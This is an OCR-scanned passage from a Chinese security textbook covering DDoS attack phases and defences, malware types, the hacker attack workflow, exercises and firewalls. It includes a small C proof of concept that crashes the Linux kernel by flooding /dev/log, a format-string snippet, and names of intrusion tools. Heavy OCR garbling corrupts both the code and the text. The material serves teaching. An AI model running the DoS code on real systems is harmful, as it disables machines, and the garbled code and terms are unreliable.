目标 主机 的 配置 和 性 能 ; 
目标 的 带宽 。 


对 于 DDoS 攻击 者 来 说 ,攻击 互联 网 上 的 某 个 站 点 ,如 http: //www. WWW. com, 有 
一 个 重点 就 是 确定 到 底 有 和 多少 台 主机 在 支持 这 个 站 点 ,一 个 大 的 网 站 可 能 有 很 多 台 主 机 利 
用 负载 均衡 技术 提供 同一 个 网 站 的 WWW 服务 。 以 Yahoo 为 例 , 一 般 会 有 下 列 地 址 都 是 
提供 http: //www. WWW. com 服务 的 : 


66. 
66. 
66. 
66. 
66. 
66. 
66. 
66. 


218.71. 87 
218.71. 88 
218.71..89 
218. 71. 80 
218. 71. 81 
218.71. 83 
218.71. 84 
218. 71. 86 


对 一 个 网 站 实施 DDoS 攻击 ,就 要 让 这 个 网 站 中 所 有 IP 地 址 的 机 器 都 瘫痪 掉 。 所 以 事 
先 搜集 情报 对 DDoS 攻击 者 来 说 是 非常 重要 的 ,这 关系 到 使 用 多 少 台 倪 偶 机 才能 达到 效果 


的 问题 。 


(2) 占领 便 偶 机 

黑客 最 感 兴趣 的 是 有 下 列 情况 的 主机 : 

。 链 路 状态 好 的 主机 ; 

。 性 能 好 的 主机 ; 

。 安全 管理 水 平 差 的 主机 。 

首先 ,黑客 做 的 工作 一 般 是 扫描 ,随机 地 或 者 是 有 针对 性 地 利用 扫描 器 去 发 现 网 络 上 那 
些 有 漏洞 的 机 器 , 像 程 序 的 溢出 漏洞 .CGI、Unicode .FTP 数据库 漏洞 (简直 举 不 胜 举 啊 ) 
等 ,都 是 黑客 希望 看 到 的 扫描 结果 。 随 后 就 是 尝试 人 侵 了 。 

黑客 在 占领 了 一 台 倪 价 机 后 ,除了 要 进行 留 后 门 、 控 脚印 这 些 基本 工作 之 外 ,还 要 把 
DDoS 攻击 用 的 程序 上 传 过 去 ,一 般 是 利用 FTP。 在 攻击 机 上 ,会 有 一 个 DDoS 的 发 包 程 
序 , 黑 客 就 是 利用 它 向 受害 目标 发 送 恶 意 攻击 包 的 。 

(3) 实际 攻击 

前 面 的 准备 做 得 好 的 话 ,实际 攻击 过 程 反 而 是 比较 简单 的 。 这 时 候 埋伏 在 攻击 机 中 的 
DDoS 攻击 程序 就 会 响应 控制 台 的 命令 ,一 起 向 受害 主机 以 高 速度 发 送 大 量 的 数据 包 , 导 致 
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它 死机 或 是 无 法 响应 正常 的 请 求 。 黑 客 一 般 会 以 远 远 超出 受害 方 处 理 能 力 的 速度 进行 攻 
击 。 高 明 的 攻击 者 还 要 一 边 攻 击 一 边 用 各 种 手段 来 监视 攻击 的 效果 ,以 便 需 要 的 时 候 进行 
一 些 调整 。 简 单 的 办 法 就 是 开 个 窗口 不 断 地 ping 目标 主机 ,在 能 接 到 回应 的 时 候 再 加 大 一 
些 流量 或 是 再 命令 更 多 的 侈 仿 机 加 入 攻击 。 


4. DDoS 的 监测 


现在 网 上 DDoS 攻击 日 益 增 多 ,只 有 及 时 检测 、 及 早 发 现 自己 受到 攻击 才能 避免 遭受 惨 
重 的 损失 。 检 测 DDoS 攻击 的 主要 方法 有 以 下 两 种 : 

(1) 根据 异常 情况 分 析 

异常 情况 包括 : 

。 网 络 的 通信 量 突然 急剧 增长 ,超过 平常 的 极限 值 ; 

。 网 站 的 某 一 特定 服务 总 是 失败 ; 

。 发现 有 特大 型 的 ICP 和 UDP 数据 包 通 过 或 数据 包 内 容 可 疑 。 

(2) 使 用 DDoS 检测 工具 

扫描 系统 漏洞 是 攻击 者 最 常 进行 的 攻击 准备 。 目 前 市 面 上 的 一 些 网 络 入 侵 检 测 系 统 可 
以 杜绝 攻击 者 的 扫描 行为 。 另 外 ,一 些 扫描 器 工具 可 以 发 现 攻 击 者 植 和 人 系统 的 代理 程序 ,并 
可 以 把 它 从 系统 中 删除 。 


5 DDoS 攻击 的 防御 策略 


DDoS 攻击 的 隐蔽 性 极 强 , 迄 今 为 止 人 们 还 没有 找到 对 DDoS 攻击 行 之 有 效 的 解决 方 
法 。 所 以 加 强 安全 防范 意识 ,提高 网 络 系统 的 安全 性 ,还 是 当前 最 为 有 效 的 办 法 。 可 采取 的 
安全 防御 措施 有 以 下 几 种 : 

(1) 及 早 发 现 系统 存在 的 攻击 漏洞 ,及 时 安装 系统 补丁 程序 。 对 一 些 重要 的 信息 (例如 
系统 配置 信息 ) 建 立 和 完善 备份 机 制 。 对 一 些 特权 账号 (例如 管理 员 账号 ) 的 密码 设置 要 说 
慎 。 通 过 这 样 一 系列 的 举措 可 以 把 攻击 者 的 可 乘 之 机 降低 到 最 小 。 

(2) 在 网 络 管理 方面 ,要 经 常 检查 系统 的 物理 环境 ,禁止 那些 不 必要 的 网 络 服务 。 建 立 
边界 安全 界限 ,确保 输出 的 包 受到 正确 限制 。 经 常 检测 系统 配置 信息 ,并 注意 查看 每 天 的 安 
全 日 志 。 

(3) 利用 网 络 安全 设备 (如 防火 墙 ) 加 固 网 络 的 安全 性 ,配置 好 它们 的 安全 规则 ,过 滤 掉 
所 有 可 能 的 伪造 数据 包 。 

(4) 与 网 络 服务 提供 商 协调 工作 ,让 他 们 帮助 实现 路 由 的 访问 控制 和 对 带宽 总 量 的 
限制 。 

(5) 当 发 现 自己 正在 遭受 DDoS 攻击 时 ,应 当 立 即 启动 应 急 策略 , 尽 可 能 快 地 追踪 攻击 
包 , 并 且 及 时 联系 ISP 和 有 关 应 急 组 织 , 分 析 受 影响 的 系统 ,确定 涉及 的 其 他 节点 ,从 而 阻挡 
从 已 知 攻击 节点 的 流量 。 

(6) 发 现 自己 的 计算 机 被 攻击 者 用 作 主 控 端 和 代理 端 时 ,不 能 因为 自己 的 系统 暂时 没 
有 受到 损害 而 掉以轻心 ,因为 攻击 者 已 发 现 你 系统 的 漏洞 ,这 是 一 个 很 大 的 潜在 威胁 。 同 时 
一 旦 发 现 系 统 中 存在 DDoS 攻击 的 工具 软件 要 及 时 把 它 清除 ,以 免 留 下 后 患 。 
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实验 15 拒绝 服务 攻击 演示 


1. 实验 目的 
了 解 拒绝 服务 攻击 的 种 类 及 其 攻击 要 点 。 
2. 实验 内 容 


(1) 总 结 当 前 已 经 发 现 有 哪些 拒绝 服务 攻击 ,以 及 它们 的 攻击 原理 (要 点 )。 
(2) 针对 一 种 可 能 造成 拒绝 攻击 的 系统 漏洞 ,为 其 设计 一 个 测试 程序 。 


3. 实验 准备 


(1) 收集 当前 已 经 发 现 有 哪些 拒绝 服务 攻击 ,以 及 它们 的 攻击 原理 (要 点 ) 。 
(2) 收集 拒绝 服务 攻击 工具 ,分 析 其 攻击 的 机 理 和 利用 的 系统 漏洞 。 

(3) 根据 分 析 的 拒绝 服务 工具 所 利用 的 系统 漏洞 ,为 其 设计 一 个 测试 程序 。 
(4) 用 自己 设计 的 程序 和 工具 进行 上 述 拒绝 服务 攻击 实验 的 环境 及 步 又。 
(5) 制定 实验 应 急 预案 。 


4. 实验 范例 


Linux 的 UNIX 域名 套 接 字 没有 考虑 /proc/sys/net/core/wmem_max 参数 的 限制 ,本 
地 普通 用 户 可 以 通过 向 某 个 套 接 字 传 送 大 量 数 据 , 导 致 Linux 内 核 分 配 内 存 空间 时 出 错 , 系 
统 停止 响应 ,必须 重新 启动 系统 。 

对 该 漏洞 ,可 以 使 用 下 面 的 测试 程序 : 

#include =sys/types. bh> 

#include =sys/socket. h> 

#include <string.h> 


char bufL128 * 1024]; 


int main ( int argc, char * *argv ) 
‘ 

struct sockaddr SyslogAddr; 

int LogFile; 

int bufsize = sizeof(buf)—5; 


int 1; 


for ( i=0; 1 二 bufsize; i 十 十 ) 
buffi]==" 十 (i%95); 
buffi]="; 


SyslogAddr. sa_family = AF_UNIX; 
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strncpy ( SyslogAddr. sa_data, "/dev/log’, 
sizeof(SyslogAddr. sa_data) ); 
LogFile = socket ( AF_UNIX, SOCK_DGRAM, 0 ); 
sendto ( LogFile, buf, bufsize, 0, &SyslogAddr, 
sizeof(SyslogAddr) ); 
return 0; 


} 


5. 推荐 的 分 析 讨论 内 容 


(1) 如 何 防止 和 发 现 拒绝 服务 攻击 ? 
(2) 其 他 发 现 或 想到 的 问题 。 


4.9 关于 恶意 代码 与 黑客 


4.9.1 恶意 代码 


恶意 代码 (malicious code) 或 恶意 程序 (malicious program) 是 指 一 类 特殊 的 程序 ,它们 
通常 在 用 户 不 知晓 也 未 授权 的 情况 下 潜入 到 计算 机 系统 中 。 

恶意 代码 可 以 分 为 许多 类 型 。 下 面 是 几 种 基本 的 类 型 。 

(1) 病毒 (virus) : 病毒 需要 依附 于 某 种 宿主 对 象 ,并且 能 够 自动 寻找 该 宿主 对 象 ,是 一 
种 具备 寄生 性 ,传染 性 、 可 触发 性 、 破 坏 性 的 可 执行 程序 。“ 寄 生性 ”也 称 依附 性 ,是 指 病毒 不 
能 独立 存在 。 “传染 性 ”是 指 病毒 可 以 通过 修改 别 的 程序 ,将 自己 的 复制 放 入 ,以 达到 传播 的 
目的 。 

(2) 蠕虫 (worm): 蠕虫 有 两 个 显著 的 特点 : 一 是 具有 存在 的 独立 性 , 即 可 以 在 内 存 、 磁 
盘 、 网 络 中 移动 的 独立 程序 ,不 需要 宿主 对 象 , 还 可 以 携带 具有 改变 其 他 程序 的 病毒 。 二 是 
具有 活动 的 独立 性 ,虽然 具有 传染 性 ,但 具有 自发 性 ,不 像 病毒 那样 需要 某 些 条 件 触发 。 

(3) 特洛伊 木马 (trojan horse) (简称 木马 ) : 木马 本 身 不 具有 传染 性 ,不 能 自行 传播 ,但 
具有 寄生 性 和 潜伏 性 ,是 一 种 包含 有 害 代码 的 有 用 或 表面 上 有 用 的 程序 或 过 程 ,激活 时 能 够 
产生 有 害 行为 。 例 如 ,能 够 在 远程 计算 机 之 间 建 立 起 连接 ,使 远程 计算 机 能 通过 网 络 控制 本 
地 计算 机 上 的 程序 。 木 马 的 控制 端 可 以 像 本 地 一 样 操作 计算 机 , 即 只 要 人 们 在 本 地 计算 机 
上 可 以 进行 的 操作 ,木马 都 可 以 实现 。 这 使 木马 成 为 黑客 的 基本 工具 。 

(4) 陷 门 (trap doors): 是 一 段 非法 的 操作 系统 程序 ,目的 是 在 一 个 程序 模块 中 留 下 未 
被 登记 的 秘密 入 口 。 通 过 它 ,用 户 可 以 不 按 正常 的 访问 步 又 获得 访问 权 。 它 们 有 些 是 程序 
员 为 了 进行 调试 和 测试 而 预 留 的 一 些 特 权 , 有 些 则 是 系统 漏洞 。 但 是 它们 往往 被 黑客 利用 ， 
成 为 系统 冯 和 者 的 后 门 。 陷 门 通常 寄生 于 某 些 程序 (有 宿主 ) ,但 无 自我 复制 功能 。 

(5) 逻辑 炸弹 (logic bomb): 是 戏 入 某 些 合法 程序 的 一 段 代码 ,没有 自我 复制 功能 , 通 
常 被 预 置 于 较 大 的 程序 中 ,在 特定 事件 发 生 时 才 被 激发 产生 破坏 行为 。 

(6) 细菌 (germ): 是 一 种 在 计算 机 系统 中 不 断 进行 自我 复制 的 程序 ,它们 通过 不 断 复 
制 来 占有 系统 资源 。 细 菌 也 具有 独立 性 。 这 两 点 与 蠕虫 相同 ,但 是 ,蠕虫 一 般 要 利用 一 些 网 
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络 工具 进行 繁殖 ,而 细菌 可 以 自己 繁殖 。 
在 恶意 代码 的 所 有 特征 中 ,寄生 性 (相对 的 是 独立 性 ) 和 感染 性 (或 称 自我 复制 能 力 ) 是 
特别 重要 的 两 种 特征 。 图 4. 31 给 出 了 按照 这 两 种 特征 进行 比较 的 情况 。 


可 感染 (可 自我 复制 ) 不 感染 (不 自我 复制 ) 
特 
蠕 细 病 党 昌 陷 
例 炸 
林 
虫 菌 马 弹 加 
AL J 
独立 性 寄生 性 


图 4.31 几 种 恶意 代码 的 基本 特征 比较 


4.9.2 黑客 攻击 


1. 黑客 及 其 攻击 发 展 趋势 


“黑客 ”是 对 于 网 络 攻击 者 的 统称 。 一 般 来 说 ,黑客 是 一 个 精通 计算 机 技术 的 特殊 群体 。 
从 攻击 的 动机 看 ,可 以 把 “黑客 "分 为 3 类 : 一 类 称 为 “黑客 (hackers)”, 他 们 多 是 好 奇 者 和 爱 
出 风头 者 ; 另 一 类 称 为 “ 骇 客 (crackers)”, 他 们 是 一 些 不 负责 的 恶作剧 者 ;第 三 类 称 为 “人 侵 
者 (intruder) ,他 们 是 有 目的 的 破坏 者 。 随 着 Internet 的 普及 ,黑客 "的 活动 日 益 狙 狐 , 造 成 
了 巨大 的 损失 。 

目前 ,黑客 攻击 有 如 下 发 展 趋势 ; 

(1) 攻击 工具 的 简单 化 : 目前 ,黑客 工具 的 技术 性 越 来 越 高 ,使 用 越 来 越 简单 ,并且 大 
多 是 图 形 化 界面 ,容易 操作 。 

(2) 攻击 目标 针对 化 : 黑客 攻击 的 目标 越 来 越 有 针对 性 ,并 主要 是 针对 意识 形态 和 商 
业 活动 ,如 Yahoo 事件 。 

(3) 攻击 方式 系统 化 : 黑客 在 攻击 方式 时间、 规模 等 方面 一 般 都 进行 了 长 时 间 的 准备 
和 部 署 ,系统 地 进行 攻击 。 

(4) 攻击 时 间 持 续 化 : 由 于 网 络 协议 的 漏洞 和 追踪 力量 的 薄弱 ,黑客 肆 无 忌 习 地 对 目 
标 进行 长 时 间 的 攻击 。 例 如 ,cnns. net 网 站 曾 承 受过 DDoS 长 达 40 余天 的 攻击 。 


2. 黑客 攻击 的 一 般 流程 


尽管 黑客 攻击 目标 偏好 不 同 .技能 有 高 低 之 分 .手法 多 种 多 样 ,但 是 他 们 对 目标 施行 攻 
击 的 流程 却 大 致 相同 ,基本 如 图 4. 32 所 示 。 
(1) 踩点 : 获取 有 关 目 标 态势 的 有 关 信息 。 
(2) 扫描 : 自动 检测 计算 机 网 络 系统 在 安全 方面 存在 的 可 能 被 黑客 利用 的 脆弱 点 。 
(3) 查 点 : 搜索 目标 上 的 用 户 、 用 户 组 名 、 路 由 表 、SNMP 信息 、 共 享 资源 、 服 务 程序 及 
旗 标 等 信息 。 
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图 4.32 黑客 的 一 般 攻击 流程 


(4) 模拟 攻击 : 进行 模拟 攻击 ,测试 对 方 反应 , 找 出 毁灭 人 侵 证 据 的 方法 。 
(5) 获取 访问 权 : 获取 访问 权 是 入侵 的 正式 开始 。 
@ Windows 系统 上 的 主要 技术 
。 NetBIOS-SMB 密码 猜测 ; 
。 窃听 LM 及 NTLM 认证 散 列 ， 
。 攻击 IIS Web 服务 器 ; 
。 远程 缓冲 区 溢出 。 
@ UNIX 系统 上 的 主要 技术 
。 蛮 力 密码 攻击 ; 
密码 窃听 ; 
。 数据 驱动 式 攻击 (如 缓冲 区 溢出 .输入 验证 .字典 攻击 等 ); 
。 RPC 攻击 ; 
。 NFS 攻击 ; 
。 针对 X-Window 系统 的 攻击 ; 
。 其 他 。 
(6) 权限 提升 : 试图 将 自己 的 普通 用 户 权 限 提升 至 超级 用 户 权 限 ,以 对 系统 进行 完全 
控制 。 权 限 提升 主要 的 技术 是 口令 破解 .利用 漏洞 以 及 不 当 配 置 等 进行 。 
常用 口令 破解 工具 为 John The RIPper。 可 以 得 到 管理 员 权 限 的 工具 有 : lc_message、 
getadmin sechole ,Invisible、Keystroke,Logger(http: //www. amecisco. com/iksnt. htm) 。 
(7) 窃取 : 对 一 些 敏 感 数据 的 算 改 、 添 加 、 删 除 和 复制 ,以 及 通过 对 敏感 数据 的 分 析 , 为 
进一步 攻击 应 用 系统 作 准 备 。 
(8) 掩盖 踪迹 : 清除 自己 所 有 的 入 侵 痕 迹 。 主 要 工作 有 : 禁止 系统 审计 、 隐 藏 作案 工 
具 、 清 空 事件 日 志 ( 使 用 zap、wzap、wted 等 ) .替换 系统 常用 操作 命令 等 。 
(9) 创建 “后 门 ”*， 入侵 目标 之 后 ,为 了 能 继续 保持 对 目标 的 访问 权 而 采用 的 技术 。 
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习 题 


1. 收集 充分 的 证 据 , 论 述 计 算 机 病毒 的 特征 。 
2. 收集 资料 ,解析 下 列 恶 意 代码 的 关键 技术 : 
(1) “求职 信 ” 病 毒 ; 
(2)“ 主 页 "病毒; 
(3)“ 欢 乐 时 光 ” 病 毒 ; 
(4)“ 爱 虫 "病毒 ; 
(5)“ 美 丽 杀手 病毒， 
(6)“ 万 花 谷 "病毒 
(7)“ 红 色 代码 ?病毒 。 
3. 在 什么 情况 下 ,病毒 能 感染 被 写 保护 的 文件 ? 
4. 收集 资料 ,解析 一 种 最 新 病毒 的 关键 技术 。 
5. 总 结 现代 病毒 技术 及 其 发 展 趋势 。 
6. 讨论 现代 病毒 检测 技术 的 发 展 趋势 。 
7. 讨论 现代 反 病 毒 技术 的 发 展 趋势 。 
8. 收集 资料 ,讨论 针对 当前 3 种 流行 病毒 的 查 、 杀 和 感染 后 的 恢复 方法 。 
9. 收集 资料 ,讨论 针对 当前 3 种 流行 蠕虫 的 查 、 杀 和 感染 后 的 恢复 方法 。 
10. 收集 资料 ,讨论 针对 当前 3 种 流行 木马 的 防范 及 清除 策略 。 
11. 分 析 蠕 虫 与 病毒 的 区 别 ,收集 资料 ,解析 下 面 蠕虫 的 关键 技术 。 
(1) 蠕虫 王 ; 
(2) 震荡 波 。 
12. 比较 病毒 .蠕虫 .木马 和 陷 门 之 间 的 异同 。 
13. 收集 尽 可 能 多 的 陷 门 的 资料 。 
14. 收集 国内 外 有 关 病 毒 和 其 他 恶意 程序 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 
15. 收集 国内 外 有 关 病 毒 和 其 他 恶意 程序 的 最 新 动态 。 
16. 查找 资料 , 写 出 3 种 网 络 炸弹 的 攻击 原理 和 防御 方法 。 
17. 试 分 析 路 由 欺骗 的 原理 ,并 与 ARP 欺骗 和 DNS 欺骗 进行 比较 。 
18. 收集 资料 ,比较 下 列传 输 介质 上 信息 被 监听 的 机 会 和 可 能 。 
(1) 以 太 网 ; 
(2) 令 牌 网 ; 
(3) 电话 网 ; 
(4) 有 线 电视 网 ; 
(5) 微波 和 无 线 电 。 
19. 试用 工具 生成 一 个 口令 字典 。 
20. 假定 允许 使 用 26 个 英文 字母 和 10 个 数字 构造 口令 ,口令 长 度 为 6 个 字符 , 若 采 用 
蛮 力 攻击 ,在 下 列 情况 下 各 需要 多 少时 间 ? 
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”检查 一 个 口令 需要 1/10 秒 时 间 。 

”检查 一 个 口令 需要 1 微 秒 时 间 。 

21. 两 人 试 在 UNIX 系统 上 进行 一 次 口令 攻击 对 抗 。 

22. 尽 可 能 多 地 收集 Sniffer 产品 数据 ,进行 比较 分 析 , 分 别 指出 它们 的 使 用 方法 和 防 


23. 介绍 一 种 扫描 工具 的 用 法 ,记录 扫描 结果 并 对 扫描 结果 进行 分 析 。 
24. 下 载 一 个 进行 缓冲 区 溢出 攻击 的 程序 ,进行 分 析 。 
25. 阅读 下 面 的 程序 ,指出 其 功能 。 
#include =stdio. bh> 
int main(int argc,char * argv[]) 
{ 
unsigned char carnary[5]; 
unsigned char foo[4]; 
memset(fo0,\x00', sizeof (fo0)); 


strecpy(camary, "XXXX"); 


fprintf (stderr, "% 16u% n% 16u%n% 32 Kn% 64u% n\n", 
Cint *) BfooL0],1, Cint*) &fooLl].1 ,(int*) &foo[2],1, (int*) &foo[3]); 
printf ("foo|carmary: %02x%02x%02x%02x| %O02x%02x%02x%02x\0, 
foo[0],foo[1],foo[2],foo[3], 
camary[0], camary[1], camary[2], camary[ 3]); 
} 
26. 在 实验 室 中 模拟 一 次 SYN Flood 攻击 的 实际 过 程 。 
27. 在 DDoS 中 ,为 什么 黑客 不 直接 去 控制 攻击 倪 儒 机 ,而 要 从 控制 便 信 机 上 转 一 
下 呢 ? 
28. 在 http: //www. fbi. gov/nipc/trinoo. htm 上 有 一 个 检测 和 根除 trinoo 的 自动 程 
序 。 请 下 载 并 试用 一 次 。 
29. trinoo DDoS 有 下 面 一 些 基 本 特性 ,请 根据 这 些 特点 提出 抵御 trinoo 的 策略 : 
(1) 在 master 程序 与 代理 程序 的 所 有 通信 中 ,trinoo 都 使 用 了 UDP 协议 。 
(2) trinoo master 程序 的 监听 端口 是 27655 ,攻击 者 一 般 借 助 telnet 通过 TCP 连接 到 
master 程序 所 在 计算 机 。 
(3) 所 有 从 master 程序 到 代理 程序 的 通信 都 包含 字符 串 *144”, 并 且 被 引导 到 代理 的 
UDP 端口 27444。 
(4) master 和 代理 之 间 通 信 受 到 口令 的 保护 ,但 是 口令 不 是 以 加 密 格 式 发 送 的 ,因此 它 
可 以 被 “ 嗅 探 ? 到 并 被 检测 出 来 。 
30. 在 网 络 上 下 载 2 一 3 个 DDoS 监测 软件 ,安装 到 自己 的 机 器 上 ,记录 其 工作 过 程 。 
31. 总 结 防 御 DDoS 的 防御 方法 。 
32. 浏览 3 个 黑客 网 站 ,综述 他 们 讨论 的 热点 问题 。 
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第 外 章 ， 司 息 系统 防卫 


面 对 日 益 独 狐 的 信息 系统 入侵 和 攻击 ,人 们 也 在 不 停 地 研究 对 策 , 开 发 防御 技术 。 目 
前 ,信息 系统 防御 系统 从 单项 诊治 系统 发 展 到 静态 防御 结合 动态 防御 、 被 动 防御 与 主动 防御 
结合 的 综合 治理 系统 。 本 章 介 绍 有 关 信 息 系 统 防御 的 一 些 基 本 技术 ,包括 : 

(1) 防火 墙 技 术 ; 

(2) 安全 审计 技术 ; 

(3) 入 侵 检测 技术 ， 

(4) 网 络 诱骗 技术 ; 

(5) 数字 证 据 技 术 ; 

(6) 应 急 响 应 ; 

(7) 数据 容 灾 和 数据 备份 。 


5.1 防火 墙 技术 


5.1.1 防火 墙 的 功能 


在 建筑 群 中 ,防火 墙 (fire wall) 用 来 防止 火灾 蔓延 。 在 计算 机 网 络 中 ,防火 墙 是 一 个 分 
离 器 .一 个 限制 器 .一 个 分 析 器 ,也 是 一 个 中 心 * 遏 制 点 ”, 是 设置 在 可 信任 的 内 部 网 络 和 不 可 
信任 的 外 界 之 间 的 一 道 屏障 , 它 可 以 屏蔽 非法 请 求 , 一 定 程度 地 防止 跨 权 限 访问 并 产生 安全 
报警 ,有 效 地 监控 了 内 部 网 和 Internet 之 间 的 任何 活动 。 具 体 地 说 ,防火 墙 有 以 下 一 些 
功能 。 


1. 作为 网 络 安全 的 屏障 


防火 墙 由 一 系列 的 软件 和 硬件 设备 组 合 而 成 , 它 保护 网 络 中 有 明确 闭合 边界 的 一 个 网 
块 ,所 有 进出 该 网 块 的 信息 都 必须 经 过 防火 墙 ,将 发 现 的 可 疑 访 问 拒 之 门 外 。 当 然 , 防 火 墙 
也 可 以 防止 未 经 允许 的 访问 进入 外 部 网 络 。 因 此 ,防火 墙 的 屏障 作用 是 双向 的 , 即 进 行内 外 
网 络 之 间 的 逻辑 隔离 ,包括 地 址 数据 包 过 滤 、 代 理 和 地 址 转换 。 


2. 防止 攻击 性 故障 蔓延 和 内 部 信息 的 泄露 


由 于 信息 的 泄露 ,常常 会 使 外 部 攻击 者 从 人 们 不 以 为 然 的 细节 中 获得 有 关 安 全 的 线索 ， 
甚至 搜索 到 内 部 网 络 的 某 些 安全 漏洞 。 防 火 墙 能 够 将 网 络 中 一 个 网 块 ( 即 网 段 ) 与 另 一 个 网 
块 隔 开 , 从 而 限制 了 局 部 重点 或 敏感 网 络 安全 问题 对 全 局 网 络 造成 的 影响 。 


3. 强化 网 络 安全 策略 


防火 墙 能 将 所 有 安全 软件 (如 口令 .加密 、 身 份 认证 .审计 等 ) 配 置 在 防火 墙 上 ,形成 以 防 
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火 墙 为 中 心 的 安全 方案 。 与 将 网 络 安全 问题 分 散 到 各 个 主机 上 相 比 ,防火 墙 的 集中 安全 管 
理 更 经 济 。 例 如 在 网 络 访问 时 ,一 次 性 口令 系统 和 其 他 的 身份 认证 系统 完全 可 以 不 必 分 散 
在 各 个 主机 上 ,而 集中 在 防火 墙 一 身上 。 


4. 对 网 络 访问 进行 监控 审计 和 报警 


审计 是 一 种 重要 的 安全 措施 ,用 以 监控 通信 行为 和 完善 安全 策略 ,检查 安全 漏洞 和 错误 
配置 ,并 对 入 侵 者 起 到 一 定 的 威慑 作用 。 报 警 机 制 是 在 通信 违反 相关 策略 以 后 ,以 多 种 方式 
如 声音 .邮件 .电话 .手机 短信 息 及 时 报告 给 管理 人 员 。 

防火 墙 的 审计 和 报警 机 制 在 防火 墙 体系 中 是 很 重要 的 ,只 有 有 了 审计 和 报警 ,管理 人 员 
才 可 能 知道 网 络 是 否 受 到 了 攻击 。 


5. 远程 管理 


管理 界面 设计 直接 关系 到 防火 墙 的 易 用 性 和 安全 性 。 目 前 防火 墙 主要 有 两 种 远程 管理 
界面 : Web 界面 和 GUI 界面 。 对 于 硬件 防火 墙 ,一 般 还 有 串口 配置 模块 或 控制 台 控 制 
界面 。 


6. MAC 与 IP 地 址 的 绑 定 


MAC 与 IP 地 址 绑 定 起 来 ,主要 用 于 防止 受 控 (不 可 访问 外 网 ) 的 内 部 用 户 通过 更 换 IP 
地 址 访问 外 网 ,或 任意 盗用 他 人 的 IP 地 址 造成 系统 管理 上 的 混乱 。 


7. 流量 控制 (带宽 管理 ) 和 统计 分 析 流量 计 费 


流量 控制 可 以 分 为 基于 IP 地 址 的 控制 和 基于 用 户 的 控制 。 基 于 IP 地 址 的 控制 是 对 通 
过 防火 墙 各 个 网 络 接口 的 流量 进行 控制 ,基于 用 户 的 控制 是 通过 用 户 登 录 来 控制 每 个 用 户 
的 流量 ,从 而 防止 某 些 应 用 或 用 户 占用 过 多 的 资源 。 并 且 通 过 流量 控制 可 以 保证 重要 用 户 
和 重要 接口 的 连接 。 

流量 统计 是 建立 在 流量 控制 基础 之 上 的 。 一 般 防火 墙 通过 对 基于 IP、 服 务 、 时 间 、 协 议 
等 进行 统计 ,并 可 以 与 管理 界面 实现 挂 接 , 实 时 或 者 以 统计 报表 的 形式 输出 结果 。 进 行 流量 
计 费 也 是 非常 容易 实现 的 。 


8. 其 他 功能 


这 些 功 能 一 般 是 为 了 迎合 特殊 客户 的 需要 或 者 为 启 得 卖点 而 添加 的 ,如 限制 同时 上 网 
人 数 ; 限 制 使 用 时 间 ; 限 制 特定 使 用 者 才能 发 送 E-mail; 限 制 FTP 只 能 下 载 文件 .不 能 上 传 
文件 ;阻塞 Java、ActiveX 控件 等 。 有 些 防 火 墙 加 入 了 扫 毒 功能 。 这 些 依 需求 不 同 而 定 。 


5.1.2 网 络 防火 墙 的 基本 结构 


1. 屏蔽 路 由 器 (screening router) 和 屏蔽 主机 (screening host) 


防火 墙 最 基本 也 是 最 简单 的 技术 是 数据 包 过 滤 。 过 滤 规 则 可 以 安装 在 路 由 器 上 ,也 可 
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以 安装 在 主机 上 。 具 有 数据 包 过 滤 功能 的 路 由 器 称 为 屏蔽 路 由 器 。 具 有 数据 包 过 滤 功能 的 
主机 称 为 屏蔽 主机 。 图 5. 1 显示 了 包 过 滤 屏 项 路 
由 器 在 网 络 中 的 位 置 。 

路 由 器 是 内 部 网 络 与 Internet 连接 的 必要 设 = 
备 ,只 要 安装 了 分 组 / 包 过 滤 ( 数 据 包 过 滤 或 应 用 屏蔽 | 型 上 忆 
网 关 ) 软 件 ,就 可 以 决定 对 到 来 的 数据 包 是 否 要 进 路 由 器 内 部 网 
行 转发 。 图 5.1 路 由 过 滤 式 防火 墙 


由 于 过 滤 路 由 器 是 建立 在 网 关 之 上 的 包 过 
滤 ,因此 它 人 允许 被 保护 网 络 的 多 台 主 机 与 Internet 的 多 台 主 机 直接 通信 。 这 样 , 其 危险 性 便 
分 布 在 被 保护 网 络 内 的 全 部 主机 以 及 允许 访问 的 各 种 服务 器 上 , 随 着 服务 的 增加 ,网 络 的 危 
险 性 也 增加 。 更 重要 的 一 点 是 ,这 种 网 络 由 于 仅 靠 单一 的 部 件 来 保护 系统 ,一 旦 部 件 被 攻 
破 ,就 再 也 没有 任何 设防 了 。 并 且 当 防火 墙 被 攻破 时 几乎 可 以 不 留 下 任何 痕迹 ,甚至 难于 发 
现 已 发 生 的 攻击 , 它 只 能 根据 数据 包 的 来 源 、 目 标 和 端口 等 网 络 信息 进行 判断 ,无 法 识别 基 
于 应 用 层 的 恶意 侵入 ,如 恶意 的 Java 小 程序 以 及 电子 邮件 中 附带 的 病毒 。 有 经 验 的 黑客 很 
容易 伪造 IP 地 址 , 骗 过 包 过 滤 型 防火 墙 ,一 旦 突破 防火 墙 , 即 可 对 主机 上 的 软件 和 配置 漏洞 
进行 攻击 。 

2. 双 宿 主 网 关 (dual homed gateway) 


如 图 5. 2 所 示 , 双 宿主 机 是 一 台 有 两 块 NIC(network interface card, 网 卡 、 网 络 接口 卡 ) 

二 的 计算 机 ,每 一 块 NIC 各 有 一 个 IP 地 址 。 所 以 它 

外 部 网 / 自 \ 可 以 采用 NAT 和 代理 两 种 安全 机 制 。 如 果 In- 

We 加 加 ternet 上 的 一 台 计 算 机 想 与 被 保护 网 (Intranet) 

双 宿 主机 部 网 上 的 一 个 工作 站 通信 ,必须 先行 注册 ,与 它 能 看 到 

的 IP 地址 联系 ,代理 服务 器 软件 通过 另 一 块 NIC 

图 5.2 双 宿 主机 网 关 防 火 墙 启动 到 Intranet 的 连接 。 

双 宿主 网 关 使 用 代理 服务 器 简化 了 用 户 的 访问 过 程 , 它 将 被 保护 网 络 与 外 界 完全 隔离 ， 

由 域名 系统 的 信息 不 会 通过 被 保护 系统 传 到 外 部 ,所 以 系统 的 名 字 和 IP 地 址 对 Internet 是 

隐蔽 的 ,做 到 对 用 户 全 透明 。 由 于 该 防火 墙 仍 是 由 单机 组 成 ,没有 安全 宛 余 机 制 ,一 旦 该 “ 单 
失效 点 ?出 问题 ,网络 将 无 安全 可 言 。 


3. 堡垒 主机 (bastion host) 


(1) 堡垒 主机 的 概念 

堡垒 主机 有 如 下 特性 : 

